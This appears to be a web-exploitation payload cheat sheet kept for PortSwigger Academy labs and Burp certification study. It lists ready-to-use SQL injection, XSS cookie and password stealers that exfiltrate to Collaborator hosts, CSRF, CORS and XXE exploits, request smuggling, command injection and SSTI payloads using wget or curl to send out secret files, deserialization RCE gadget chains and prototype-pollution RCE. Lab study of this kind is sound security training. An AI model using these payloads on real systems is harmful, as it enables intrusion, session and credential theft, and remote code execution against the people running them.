# Payloads

## SQLi

### UNION SQLi

```
#clause bypass
'+OR+1=1--

#login bypass
administrator'--

#union detection
'+ORDER+BY+1--
'+ORDER+BY+2--
'+ORDER+BY+3--
'+UNION+SELECT+NULL,NULL--
'+UNION+SELECT+'abcdef',NULL,NULL--

#Oracle version
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--

#MySQL and Microsoft SQL Server version
'+UNION+SELECT+@@version,+NULL#

#Table and column names
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--

#Table and column names (Oracle)
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_ABCDEF'--

#Multiple columns concatenated into one
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
```

### Blind SQLi

```
#Conditional response
TrackingId=xyz' AND '1'='1
TrackingId=xyz' AND '1'='2

#Table exists
TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a

#User exists
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a

#Password length
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a

#Password guess
TrackingId=xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a

```

### Blind error based SQLi

```
TrackingId=xyz'||(SELECT '')||'
TrackingId=xyz'||(SELECT '' FROM dual)||'
TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>3 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'

```

### Visible Error

```
TrackingId=ogAZZfxtOKUELbuJ' AND CAST((SELECT 1) AS int)--
TrackingId=ogAZZfxtOKUELbuJ' AND 1=CAST((SELECT username FROM users) AS int)--
TrackingId=' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--
TrackingId=' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--

```

### Blind Time-based

```
TrackingId=x'||pg_sleep(10)--
select 1 from pg_sleep(5)
;(select 1 from pg_sleep(5))
||(select 1 from pg_sleep(5))

TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

```

### Out of Band Interactions

```
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

```

### SQLi inside XML

```
<storeId><@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities></storeId>

```

## XSS

### DOM-based XSS

```
#document.write sink
product?productId=1&storeId="></select><img%20src=1%20onerror=alert(1)>

#document.write sink
"><svg onload=alert(1)>

#innerHTML sink
<img src=1 onerror=alert(1)>

#jQuery href sink
javascript:alert(document.cookie)

#jQuery selector sink
<iframe src="https://lab.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>

#angular ng-app
{{$on.constructor('alert(1)')()}}

1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1

#json sink
\"-alert(1)}//

#bypass angle brackets replace
<><img src=1 onerror=alert(1)>

#open redirection
https://lab.web-security-academy.net/post?postId=4&url=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/

#cookie manipulation
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/product?productId=1&'><script>print()</script>" onload="if(!window.x)this.src='https://YOUR-LAB-ID.web-security-academy.net';window.x=1;">

#WAF bypass
"-alert(window["document"]["cookie"])-"
"-window["alert"](window["document"]["cookie"])-"
"-self["alert"](self["document"]["cookie"])-"
```

* The **eval()** method evaluates or executes its argument.
* **atob()** and **btoa()** are functions for decoding from and encoding to base64 strings.
* If **eval()** is blocked, alternatives are:
  * setTimeout("code")
  * setInterval("code")
  * setImmediate("code")
  * Function("code")()

### XSS web messages

```
<iframe src="https://lab.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

<iframe src="https://YOUR-LAB-ID.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')">

#JSON.parse() sink of web msg
<iframe src=https://YOUR-LAB-ID.web-security-academy.net/ onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}","*")'>

```

### Reflected

```
#js string with angle brackets
'-alert(1)-'
blez';alert(1);let myvar='test

#tag attribute with angle brackets <> encoded
test" onmouseover="alert(1)

#blocked tags and attrs
<iframe src="https://lab.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>

#custom tags
<script>
location = 'https://lab.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>

#svg tag allowed
https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E

#single quote and backslash escape
</script><script>alert(1)</script>

#js with angle brackets, double quotes and single quotes escaped
\'-alert(1)//

#all quotes backslash-escaped, but inside a js template literal (backticks)
${alert(1)}

\'-alert(1)//

fuzzer\';console.log(12345);//

fuzzer\';alert(`Testing The backtick a typographical mark used mainly in computing`);//
```

### Stored

```
#href with double quotes
javascript:alert(1)

http://foo?&apos;-alert(1)-&apos;

#replacing angle brackets bypass
<><img src=1 onerror=alert(1)>
```

### XSS stealers

```
#cookie stealer
<script>
fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

#password stealer
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
```

### XSS to CSRF

```
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
```

## CSRF

```
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="email" value="blez@b.b">
</form>
<script>
        document.forms[0].submit();
</script>




#Method changed to GET
<form action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="email" value="blez@b.b">
</form>
<script>
        document.forms[0].submit();
</script>



#token tied to non-session cookie
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="email" value="blez@b.b">
</form>
<img src="https://YOUR-LAB-ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=YOUR-KEY%3b%20SameSite=None" onerror="document.forms[0].submit()">




#token duplicated in cookie
<img src="https://YOUR-LAB-ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit();"/>




#SameSite Lax Bypass by method override
<script>
    document.location = "https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email?email=pwned@web-security-academy.net&_method=POST";
</script>




#SameSite Strict Bypass via redirect
<script>
    document.location = "https://YOUR-LAB-ID.web-security-academy.net/post/comment/confirmation?postId=1/../../my-account/change-email?email=pwned%40web-security-academy.net%26submit=1";
</script>



#SameSite Lax bypass by cookie refresh
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="email" value="pwned@portswigger.net">
</form>
<p>Click anywhere on the page</p>
<script>
    window.onclick = () => {
        window.open('https://YOUR-LAB-ID.web-security-academy.net/social-login');
        setTimeout(changeEmail, 5000);
    }

    function changeEmail() {
        document.forms[0].submit();
    }
</script>


#bypass Referer validation with a header on the exploit server
<meta name="referrer" content="no-referrer">



#bypass broken Referer validation
Referrer-Policy: unsafe-url
history.pushState("", "", "/?YOUR-LAB-ID.web-security-academy.net")


```

### CSWSH - Cross-Site WebSocket Hijacking

```
#script to start a websocket chat
<script>
    var ws = new WebSocket('wss://YOUR-LAB-ID.web-security-academy.net/chat');
    ws.onopen = function() {
        ws.send("READY");
    };
    ws.onmessage = function(event) {
        fetch('https://YOUR-COLLABORATOR-PAYLOAD.oastify.com', {method: 'POST', mode: 'no-cors', body: event.data});
    };
</script>

<script>
    document.location = "https://cms-YOUR-LAB-ID.web-security-academy.net/login?username=YOUR-URL-ENCODED-CSWSH-SCRIPT&password=anything";
</script>
```

## CORS

```
#Access-Control-Allow-Origin reflects the Origin with Access-Control-Allow-Credentials: true
<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='/log?key='+this.responseText;
    };
</script>


#CORS trusting the null origin: a sandboxed iframe generates a null-origin request
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
    };
</script>"></iframe>


#reflected subdomain with XSS in productID
<script>
    document.location="http://stock.YOUR-LAB-ID.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
```

## XXE

```
#get file with external entities
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<productID>&xxe;</productID>

#ssrf attack to public address
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<productID>&xxe;</productID>
```

### Blind XXE

```
#out of band blind xxe
<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> ]>
<productID>&xxe;</productID>

#out of band parameter entities
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> %xxe; ]>

```

### External DTD XXE

```
#malicious DTD out of band exfiltration
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>">
%eval;
%exfil;

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>


#Error based
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>

```

### XInclude injection

```
<productID>
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
</productID>
```

### XXE image upload

```
#create a local svg file with this content
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

```

## SSRF

```
#try changing the api host to localhost
http://localhost/admin

#try calling the api on an internal ip
http://192.168.0.1:6566/admin

http://127.0.0.1/admin

http://127.1/admin

#double url-encoded 'a' obfuscation
http://127.1/%2561dmin

#open redirection ssrf
/product/nextProduct?path=http://192.168.0.12:6566/admin
```

## Request Smuggling

### CL.TE

```
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Transfer-Encoding: chunked

0

GET /404 HTTP/1.1
X-Ignore: X

-------------------------------------------------------------------------------------

#Bypass front-end control
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=


-------------------------------------------------------------------------------------
#The front-end server adds an HTTP header to incoming requests containing their IP address
#host rewriting
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 166
Transfer-Encoding: chunked

0

GET /admin/delete?username=carlos HTTP/1.1
X-abcdef-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Connection: close

x=1



-------------------------------------------------------------------------------------


#Steal user cookie
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 256
Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 400
Cookie: session=your-session-token

csrf=your-csrf-token&postId=5&name=Carlos+Montoya&email=carlos%40normal-user.net&website=&comment=test



-------------------------------------------------------------------------------------
#smuggling request with xss inside the header
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Transfer-Encoding: chunked

0

GET /post?postId=5 HTTP/1.1
User-Agent: a"/><script>document.location='http://OASTIFY.COM/?cookiestealer='+document.cookie;</script>
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

x=1
```

### TE.CL

```
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

-------------------------------------------------------------------------------------

#Bypass frontend control
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked

87
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0
```

### H2.CL

1. Send the request a few times and confirm that you receive a redirect to the exploit server.
2. Resend the request and wait for 10 seconds or so.
3. Go to the exploit server and check the access log. If you see a `GET /resources/` request from the victim, this indicates that your request smuggling attack was successful.

```
POST / HTTP/2
Host: YOUR-LAB-ID.web-security-academy.net
Content-Length: 0


GET /resources HTTP/1.1
Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net
Content-Length: 5

x=1
```

### H2.TE

Send the request to poison the response queue. You will receive the 404 response to your own request.

Wait for around 5 seconds, then send the request again to fetch an arbitrary response.

Repeat this process until you capture a 302 response containing the admin's new post-login session cookie.

Copy the session cookie and use it to send the following request:

```
GET /admin HTTP/2
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=STOLEN-SESSION-COOKIE
```

```
POST /x HTTP/2
Host: YOUR-LAB-ID.web-security-academy.net
Transfer-Encoding: chunked

0

GET /x HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
```

### H2 CRLF Injection

[![http2-inspector](https://github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/raw/main/images/http2-inspector.png)](https://github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/blob/main/images/http2-inspector.png)

> Note: enable the **Allow HTTP/2 ALPN override** option and change the body of HTTP/2 request to below POST request.

```
0

POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=HACKER-SESSION-COOKIE
Content-Length: 800

search=nutty
```

### H2.TE desync v10a h2path

```
POST /x HTTP/2
Host: TARGET.net
Transfer-Encoding: chunked

0

GET /x HTTP/1.1
Host: TARGET.web-security-academy.net\r\n
\r\n
```

### CL.0

1. Using the drop-down menu next to the **Send** button, change the send mode to **Send group in sequence (single connection)**.

```
POST /resources/images/blog.svg HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=YOUR-SESSION-COOKIE
Connection: keep-alive
Content-Length: CORRECT

GET /admin HTTP/1.1
Foo: x
```

## OS cmd injection

```
storeID=1|whoami

email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||

email=||$(curl $(cat /home/carlos/secret).OASTIFY.COM)||

#path traversal allowed
||pwd>output.txt||
||echo>>output.txt||
||cat+/etc/hosts>>/var/www/images/output.txt||
||echo>>output.txt||
||ls+-al>>/var/www/images/output.txt||
||echo>>output.txt||
||whoami>>/var/www/images/output.txt||

```

## SSTI

```
#these will throw an error
${{<%[%'"}}%\.
${{<%[%'"}}%\.,

}}{{7*7}} 
{{fuzzer}}
${fuzzer}
${{fuzzer}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
${foobar}
{% debug %}


#ERB
<%= system("cat+/home/carlos/secret") %>
https://YOUR-LAB-ID.web-security-academy.net/?message=<%25+system("cat+/home/carlos/secret")+%25>



#Tornado
POST /my-account/change-blog-post-author-display HTTP/2
Host: TARGET.net
Cookie: session=fenXl1hfjQBgGkrcmJoK7D8RU3eHkkCd

blog-post-author-display=user.name}}{%25+import+os+%25}{{os.system('cat%20/home/carlos/secret')




#FreeMarker
${foobar}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("cat /home/carlos/secret") }



#Handlebars, url encoded as url param
wrtz{{#with "s" as |string|}}
    {{#with "e"}}
        {{#with split as |conslist|}}
            {{this.pop}}
            {{this.push (lookup string.sub "constructor")}}
            {{this.pop}}
            {{#with string.split as |codelist|}}
                {{this.pop}}
                {{this.push "return require('child_process').exec('wget https://OASTIFY.COM --post-file=/home/carlos/secret');"}}
                {{this.pop}}
                {{#each conslist}}
                    {{#with (string.sub.apply 0 codelist)}}
                        {{this}}
                    {{/with}}
                {{/each}}
            {{/with}}
        {{/with}}
    {{/with}}
{{/with}}
```

## Path Traversal

```
/home/carlos/secret
....//....//....//....//home//carlos//secret
..%252f..%252f..%252fhome/carlos/secret
/var/www/images/../../../home/carlos/secret
../../../home/carlos/secret%00.png
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fhome%252fcarlos%252fsecret


/etc/passwd
....//....//....//....//etc//passwd
..%252f..%252f..%252fetc/passwd
/var/www/images/../../../etc/passwd
../../../etc/passwd%00.png
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
```

## Authentication

<https://portswigger.net/web-security/authentication/auth-lab-usernames>

<https://portswigger.net/web-security/authentication/auth-lab-passwords>

## Web Sockets

```
<script>
    var ws = new WebSocket('wss://your-websocket-url');
    ws.onopen = function() {
        ws.send("READY");
    };
    ws.onmessage = function(event) {
        fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
    };
</script>



```

## OAuth

```
#open redirection oauth steal token

<script>
    if (!document.location.hash) {
        window.location = 'https://oauth-YOUR-OAUTH-SERVER-ID.oauth-server.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-LAB-ID.web-security-academy.net/oauth-callback/../post/next?path=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/exploit/&response_type=token&nonce=399721827&scope=openid%20profile%20email'
    } else {
        window.location = '/?'+document.location.hash.substr(1)
    }
</script>
```

## Deserialization

<pre><code> #JAVA
java -jar /opt/ysoserial/ysoserial.jar CommonsCollections3 'wget http:// --post-file=/home/carlos/secret' | base64 -w 0 
java -jar /opt/ysoserial/ysoserial.jar CommonsCollections4 'wget http://5v1foaz3jyqn51jftzizmb5rtiz9nzbo.oastify.com --post-file=/home/carlos/secret' | base64 -w 0 




#PHP
#path to find a secret
/cgi-bin/phpinfo.php

#command creation
/opt/phpggc/phpggc Symfony/RCE4 exec 'wget http://5v1foaz3jyqn51jftzizmb5rtiz9nzbo.oastify.com --post-file=/home/carlos/secret' | base64 -w 0

#payload creation
&#x3C;?php
$object = "";
$secretKey = "q9ekwze228qxcdd9uvfjxxkfsipzq9ul";
$cookie = urlencode('{"token":"' . $object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $object, $secretKey) . '"}');
echo $cookie;




#RUBY script - 
<strong># Autoload the required classes
</strong>Gem::SpecFetcher
Gem::Installer

# prevent the payload from running when we Marshal.dump it
module Gem
  class Requirement
    def marshal_dump
      [@requirements]
    end
  end
end

wa1 = Net::WriteAdapter.new(Kernel, :system)

rs = Gem::RequestSet.allocate
rs.instance_variable_set('@sets', wa1)
rs.instance_variable_set('@git_set', "wget http://5v1foaz3jyqn51jftzizmb5rtiz9nzbo.oastify.com --post-file=/home/carlos/secret")

wa2 = Net::WriteAdapter.new(rs, :resolve)

i = Gem::Package::TarReader::Entry.allocate
i.instance_variable_set('@read', 0)
i.instance_variable_set('@header', "aaa")


n = Net::BufferedIO.allocate
n.instance_variable_set('@io', i)
n.instance_variable_set('@debug_output', wa2)

t = Gem::Package::TarReader.allocate
t.instance_variable_set('@io', n)

r = Gem::Requirement.allocate
r.instance_variable_set('@requirements', t)

payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
puts Base64.encode64(payload)

</code></pre>

## JWT

<https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list>

```
#crack JWT secret
hashcat -a 0 -m 16500 <YOUR-JWT> /path/to/jwt.secrets.list
```

## Prototype pollution

```
#bypass sanitization
/?__pro__proto__to__[foo]=bar
/?__pro__proto__to__.foo=bar
/?constconstructorructor[protoprototypetype][foo]=bar
/?constconstructorructor.protoprototypetype.foo=bar


<script>
    location="https://YOUR-LAB-ID.web-security-academy.net/#__proto__[hitCallback]=alert%28document.cookie%29"
</script>


"__proto__": {
    "isAdmin":true
}


#server side prototype pollution
"constructor": {
    "prototype": {
        "isAdmin":true
    }
}


"__proto__": {
    "execArgv":[
        "--eval=require('child_process').execSync('cat /home/carlos/secret')"
    ]
}
```

